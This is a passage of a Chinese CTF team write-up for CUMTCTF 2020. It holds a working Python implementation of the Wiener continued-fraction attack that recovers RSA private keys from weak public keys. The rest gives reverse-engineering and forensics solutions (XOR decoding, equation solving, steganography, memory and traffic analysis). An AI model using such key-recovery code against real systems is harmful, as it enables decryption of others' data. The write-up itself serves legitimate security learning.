class="string"></span></span><br><span class="line"><span class="string">@author: pablocelayes</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> codecs</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hack_RSA</span>(<span class="params">e,n</span>):</span></span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    Finds d knowing (e,n)</span></span><br><span class="line"><span class="string">    applying the Wiener continued fraction attack</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    frac = ContinuedFractions.rational_to_contfrac(e, n)</span><br><span class="line">    convergents = ContinuedFractions.convergents_from_contfrac(frac)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> (k,d) <span class="keyword">in</span> convergents:</span><br><span class="line">        </span><br><span class="line">        <span class="comment">#check if d is actually the key</span></span><br><span class="line">        <span class="keyword">if</span> k!=<span class="number">0</span> <span class="keyword">and</span> (e*d<span class="number">-1</span>)%k == <span class="number">0</span>:</span><br><span class="line">            phi = (e*d<span class="number">-1</span>)//k</span><br><span class="line">            s = n - phi + <span class="number">1</span></span><br><span class="line">            <span class="comment"># check if the equation x^2 - s*x + n = 0</span></span><br><span class="line">            <span class="comment"># has integer roots</span></span><br><span class="line">            discr = s*s - <span class="number">4</span>*n</span><br><span class="line">            <span class="keyword">if</span>(discr&gt;=<span class="number">0</span>):</span><br><span class="line">                t = Arithmetic.is_perfect_square(discr)</span><br><span class="line">                <span class="keyword">if</span> t!=<span class="number">-1</span> <span class="keyword">and</span> (s+t)%<span class="number">2</span>==<span class="number">0</span>:</span><br><span class="line">                    <span class="comment"># print(&quot;Hacked!&quot;)</span></span><br><span class="line">                    <span class="keyword">return</span> d</span><br><span class="line"></span><br><span class="line"><span class="comment"># TEST functions</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test_hack_RSA</span>():</span></span><br><span class="line">    <span class="comment"># print(&quot;Testing Wiener Attack&quot;)</span></span><br><span class="line">    times = <span class="number">5</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">while</span>(times&gt;<span class="number">0</span>):</span><br><span class="line">        e,n,d = RSAvulnerableKeyGenerator.generateKeys(<span class="number">1024</span>)</span><br><span class="line">        <span class="comment"># print(&quot;(e,n) is (&quot;, e, &quot;, &quot;, n, &quot;)&quot;)</span></span><br><span class="line">        <span class="comment"># print(&quot;d = &quot;, d)</span></span><br><span class="line">    </span><br><span class="line">        hacked_d = hack_RSA(e, n)</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> d == hacked_d:</span><br><span class="line">            <span class="comment"># print(&quot;Hack WORKED!&quot;)</span></span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="comment"># print(&quot;Hack FAILED&quot;)</span></span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># print(&quot;d = &quot;, d, &quot;, hacked_d = &quot;, hacked_d)</span></span><br><span class="line">        <span class="comment"># print(&quot;-------------------------&quot;)</span></span><br><span class="line">        times -= <span class="number">1</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    n = <span class="number">460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597</span></span><br><span class="line">    e = <span class="number">354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619</span></span><br><span class="line">    c = <span class="number">235079473042454099807116076488262740135383858230967099540307826273199444131724945298259060669497025680602868465015609167157760611830665379910856647739895018654389167886359502125262006498872925841789249028759026079722290718145036644959479543255350040619949567107916725017078853648984759794085772688267388901151</span></span><br><span class="line">    <span class="comment">#test_is_perfect_square()</span></span><br><span class="line">    d = <span class="number">8264667972294275017293339772371783322168822149471976834221082393409363691895</span></span><br><span class="line">    m = pow(c,d,n)</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">num2str</span>(<span class="params">num</span>):</span></span><br><span class="line">        tmp = hex(num)[<span class="number">2</span>:].replace(<span class="string">&quot;L&quot;</span>,<span class="string">&quot;&quot;</span>)</span><br><span class="line">        <span class="keyword">if</span>(len(tmp))%<span class="number">2</span> ==<span class="number">0</span>:</span><br><span class="line">            <span class="keyword">return</span> codecs.decode(tmp, encoding=<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> codecs.decode((<span class="string">&quot;0&quot;</span>+tmp), encoding=<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># print(&quot;-------------------------&quot;)</span></span><br><span class="line">    print(str(num2str(pow(c,hack_RSA(e,n),n)), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br></pre></td></tr></table></figure>



<h2 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h2><h3 id="hello-world"><a href="#hello-world" class="headerlink" title="hello_world"></a>hello_world</h3><blockquote>
<p>Author: 季廷宇、周浩</p>
</blockquote>
<p>简单的逆向，使用Python将flag重新异或即可得到。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">a2=[<span class="number">0x2A</span>,<span class="number">0x26</span>,<span class="number">0x12</span>,<span class="number">0x31</span>,<span class="number">0x1A</span>,<span class="number">0x7</span>,<span class="number">0x11</span>,<span class="number">0x3A</span>,<span class="number">0x2D</span>,<span class="number">0x0F</span>,<span class="number">0x0E</span>,<span class="number">0x1A</span>,<span class="number">0x41</span>,<span class="number">0x4B</span>,<span class="number">0x36</span>,<span class="number">0x43</span>,<span class="number">0x31</span>,<span class="number">0x0</span>,</span><br><span class="line"><span class="number">0x3E</span>,<span class="number">0x16</span>,<span class="number">0x17</span>,<span class="number">0x35</span>,<span class="number">0x1D</span>,<span class="number">0x10</span>,<span class="number">0x38</span>,<span class="number">0x11</span>,<span class="number">0x44</span>,<span class="number">0x4A</span>,<span class="number">0x1B</span>,<span class="number">0x2C</span>,<span class="number">0x2B</span>,<span class="number">0x17</span>,<span class="number">0x50</span>,<span class="number">0x3</span>,<span class="number">0x4</span>]</span><br><span class="line"></span><br><span class="line">S = <span class="string">&#x27;is_easy_right?&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(a2)):</span><br><span class="line">    a2[i] = chr(a2[i] ^ ord(S[i % len(S)]))</span><br><span class="line"></span><br><span class="line">print(<span class="string">&quot;&quot;</span>.join(a2))</span><br></pre></td></tr></table></figure>





<h3 id="non-name"><a href="#non-name" class="headerlink" title="non_name"></a>non_name</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>IDA打开</p>
<p><img src="https://i.loli.net/2020/10/23/mGUkRplWQwC7uEK.png" alt="image-20201023173254322"></p>
<p>分析代码，得出将byte_403010（<strong>a1…a12</strong>）中前四个数据对应乘上byte_40703E（<strong>x1,x2,x3,x4</strong>）中的四个数据的和为dword中第一个数据（<strong>n1</strong>），以此类推。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">a1*x1 + a2*x2 + a3*x3 + a4*x4   =  n1</span><br><span class="line">a5*x1 + a6*x2 + a7*x3 + a8*x4   =  n2</span><br><span class="line">a9*x1 + a10*x2 + a11*x3 + a12*x4 = n3</span><br><span class="line">a13*x1 + a14*x2 + a15*x3 + a16*x4 = n4</span><br></pre></td></tr></table></figure>

<p>转为四元一次方程组求解问题</p>
<p>编写脚本解出flag</p>
<p><img src="https://i.loli.net/2020/10/23/BOj35EozyAemGlb.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> numpy <span class="keyword">as</span> np</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> scipy.linalg <span class="keyword">import</span> solve </span><br><span class="line">a = np.array([[<span class="number">0xC</span>, <span class="number">0x20</span>, <span class="number">0x22</span>, <span class="number">0x0C</span>],[<span class="number">0x35</span>, <span class="number">0x1</span>, <span class="number">0x2</span>, <span class="number">0x4</span>],</span><br><span class="line">              [<span class="number">0x6</span>, <span class="number">0x8</span>, <span class="number">0x22</span>, <span class="number">0x2D</span>],[<span class="number">0x38</span>,<span class="number">0x20</span>, <span class="number">0x55</span>, <span class="number">0x2B</span>]])</span><br><span class="line">b = np.array([<span class="number">0x2534</span>,<span class="number">0x1AFF</span>,<span class="number">0x2786</span>,<span class="number">0x5B44</span>])</span><br><span class="line">x = solve(a, b)</span><br><span class="line"></span><br><span class="line">print(x)</span><br></pre></td></tr></table></figure>

<p>对应输出为：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">116.103</span><span class="type">.102.114.</span>]</span><br></pre></td></tr></table></figure>

<p>以十六进制输出得到Flag</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="Sign-In"><a href="#Sign-In" class="headerlink" title="Sign In"></a>Sign In</h3><blockquote>
<p>Author: 钟昌甫 </p>
</blockquote>
<p>base64解密得到Brainfuck代码，使用<a target="_blank" rel="noopener" href="https://www.splitbrain.org/services/ook%E5%9C%A8%E7%BA%BF%E8%A7%A3%E7%A0%81%E5%BE%97%E5%88%B0flag">https://www.splitbrain.org/services/ook在线解码得到flag</a></p>
<p><img src="https://i.loli.net/2020/10/23/7z1Yib6TrqFN2mu.png" alt="image-20201023162930300"></p>
<h3 id="出个流量分析吧"><a href="#出个流量分析吧" class="headerlink" title="出个流量分析吧"></a>出个流量分析吧</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>Wireshark打开，发现主要为TCP协议，追踪流没有有用的信息。导出HTTP对象，发现两个submitFlag文件</p>
<p><img src="https://i.loli.net/2020/10/23/siIXVmhAL7y6lDR.png" alt="image-20201023163508009"></p>
<p>打开发现base64编码，解码得flag</p>
<p><img src="https://i.loli.net/2020/10/23/Jkj47tW1AXqlczy.png" alt="image-20201023163604919"></p>
<h3 id="出个LSB吧"><a href="#出个LSB吧" class="headerlink" title="出个LSB吧"></a>出个LSB吧</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>LSB隐写：使用StegSolve打开，发现红绿蓝的0通道有内容，使用Data Extract结合导出</p>
<p><img src="https://i.loli.net/2020/10/23/PJFjd19moLwln5f.png" alt="image-20201023164924470"></p>
<p>得到二维码，扫码出flag</p>
<p><img src="https://i.loli.net/2020/10/23/C2B35ROsk71fqJI.png" alt="image-20201023165110540"></p>
<h3 id="出个伪web吧"><a href="#出个伪web吧" class="headerlink" title="出个伪web吧"></a>出个伪web吧</h3><blockquote>
<p>Author:  周浩</p>
</blockquote>
<p>按修改日期排序找到最近修改过的include.php，打开</p>
<p><img src="https://i.loli.net/2020/10/23/sEpWHylrx7LkgMX.png" alt="image-20201023165635436"></p>
<p>找到flag</p>
<h3 id="出个文档吧"><a href="#出个文档吧" class="headerlink" title="出个文档吧"></a>出个文档吧</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>打开word，发现有内容但没有显示出来</p>
<p><img src="https://i.loli.net/2020/10/23/YcKRhFH4aQkPbus.png" alt="image-20201023170345983"></p>
<p>显示隐藏文字</p>
<p><img src="https://i.loli.net/2020/10/23/C4gP8vHycBXS9NE.png" alt="image-20201023170447531"></p>
<p>得到flag</p>
<h3 id="出个内存取证吧"><a href="#出个内存取证吧" class="headerlink" title="出个内存取证吧"></a>出个内存取证吧</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>使用<strong>volatility</strong>进行内存分析，使用iehistory查看到有文件flag.png，下载该文件。</p>
<p>可以从该png中再分解一张图片出来，二维码扫描得到密文，利用另一张的密钥即可解出flag。</p>
<h3 id="出个压缩包吧"><a href="#出个压缩包吧" class="headerlink" title="出个压缩包吧"></a>出个压缩包吧</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>解压后得到flag.rar，再解压得到flag.txt，没有flag</p>
<p>使用010editor打开，发现压缩包内还有一个secret.png但没有解压出来，发现png文件头74被改为7A，改回后解压</p>
<p><img src="https://i.loli.net/2020/10/23/d57g3ShwsVeakG8.png" alt="image-20201023170829938"></p>
<p>再使用010editor查看，是gif文件，使用在线工具<a target="_blank" rel="noopener" href="https://tu.sioe.cn/gj/fenjie/%E5%88%86%E8%A7%A3%E5%87%BA%E4%B8%A4%E5%BC%A0%E5%9B%BE%E7%89%87">https://tu.sioe.cn/gj/fenjie/分解出两张图片</a></p>
<p>StegSolve打开</p>
<p><img src="https://i.loli.net/2020/10/23/1J5v6g9OzXcuVdA.png" alt="image-20201023171941190"></p>
<p>在画图工具中拼接、补全定位点</p>
<p><img src="https://i.loli.net/2020/10/23/zDbGOlgAhUfoZnd.png" alt="image-20201023172429424"></p>
<h2 id="Summarize"><a href="#Summarize" class="headerlink" title="Summarize"></a>Summarize</h2><h4 id="By-周浩"><a href="#By-周浩" class="headerlink" title="By 周浩"></a>By 周浩</h4><p><strong>babyflask</strong>、<strong>doge</strong>、<strong>Hordor</strong>、<strong>Classical</strong>、<strong>ezRSA</strong>、<strong>hello_world</strong>、<strong>出个伪Web吧</strong>、<strong>出个内存取证吧</strong></p>
<p>共8题</p>
<h4 id="By-季廷宇"><a href="#By-季廷宇" class="headerlink" title="By 季廷宇"></a>By 季廷宇</h4><p><strong>hello_world</strong>、<strong>non_name</strong>、<strong>出个流量分析吧</strong>、<strong>出个LSB吧</strong>、<strong>出个文档吧</strong>、<strong>出个压缩包吧</strong></p>
<p>共6题</p>
<h4 id="By-钟昌甫"><a href="#By-钟昌甫" class="headerlink" title="By 钟昌甫"></a>By 钟昌甫</h4><p><strong>doge</strong>、<strong>Sign In</strong></p>
<p>共2题</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>本次比赛中，每位参赛队员都为比赛贡献了力量，感谢@<strong>沈瑞喆</strong>对Web方面提供的可行性思路；感谢@<strong>季廷宇</strong>在MISC方向上的夺分；感谢@<strong>钟昌甫</strong>在Crypto以及Web方面提供的可行性建议。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/bug-ddblog-punish/tags/CUMTCTF/" rel="tag"># CUMTCTF</a>
              <a href="/bug-ddblog-punish/tags/Writeup/" rel="tag"># Writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/bug-ddblog-punish/p/59556/" rel="prev" title="CUMTCTF-2020-9">
      <i class="fa fa-chevron-left"></i> CUMTCTF-2020-9
    </a></div>
      <div class="post-nav-item">
    <a href="/bug-ddblog-punish/p/24157/" rel="next" title="CUMTCTF-Entry-Competition">
      CUMTCTF-Entry-Competition <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#babyflask"><span class="nav-number">1.1.</span> <span class="nav-text">babyflask</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#doge"><span class="nav-number">1.2.</span> <span class="nav-text">doge</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Hordor"><span class="nav-number">1.3.</span> <span class="nav-text">Hordor</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-number">2.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Classical"><span class="nav-number">2.1.</span> <span class="nav-text">Classical</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ezRSA"><span class="nav-number">2.2.</span> <span class="nav-text">ezRSA</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Re"><span class="nav-number">3.</span> <span class="nav-text">Re</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#hello-world"><span class="nav-number">3.1.</span> <span class="nav-text">hello_world</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#non-name"><span class="nav-number">3.2.</span> <span class="nav-text">non_name</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Misc"><span class="nav-number">4.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Sign-In"><span class="nav-number">4.1.</span> <span class="nav-text">Sign In</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AA%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E5%90%A7"><span class="nav-number">4.2.</span> <span class="nav-text">出个流量分析吧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AALSB%E5%90%A7"><span class="nav-number">4.3.</span> <span class="nav-text">出个LSB吧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AA%E4%BC%AAweb%E5%90%A7"><span class="nav-number">4.4.</span> <span class="nav-text">出个伪web吧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AA%E6%96%87%E6%A1%A3%E5%90%A7"><span class="nav-number">4.5.</span> <span class="nav-text">出个文档吧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AA%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81%E5%90%A7"><span class="nav-number">4.6.</span> <span class="nav-text">出个内存取证吧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BA%E4%B8%AA%E5%8E%8B%E7%BC%A9%E5%8C%85%E5%90%A7"><span class="nav-number">4.7.</span> <span class="nav-text">出个压缩包吧</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Summarize"><span class="nav-number">5.</span> <span class="nav-text">Summarize</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#By-%E5%91%A8%E6%B5%A9"><span class="nav-number">5.0.1.</span> <span class="nav-text">By 周浩</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#By-%E5%AD%A3%E5%BB%B7%E5%AE%87"><span class="nav-number">5.0.2.</span> <span class="nav-text">By 季廷宇</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#By-%E9%92%9F%E6%98%8C%E7%94%AB"><span class="nav-number">5.0.3.</span> <span class="nav-text">By 钟昌甫</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">5.0.4.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Zhou Hao</p>
  <div class="site-description" itemprop="description">bugDD的日常总结</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/bug-ddblog-punish/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zhou Hao</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/bug-ddblog-punish/lib/anime.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.ui.min.js"></script>

<script src="/bug-ddblog-punish/js/utils.js"></script>

<script src="/bug-ddblog-punish/js/motion.js"></script>


<script src="/bug-ddblog-punish/js/schemes/muse.js"></script>


<script src="/bug-ddblog-punish/js/next-boot.js"></script>




  




  
<script src="/bug-ddblog-punish/js/local-search.js"></script>













  

  

  

</body>

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</html>
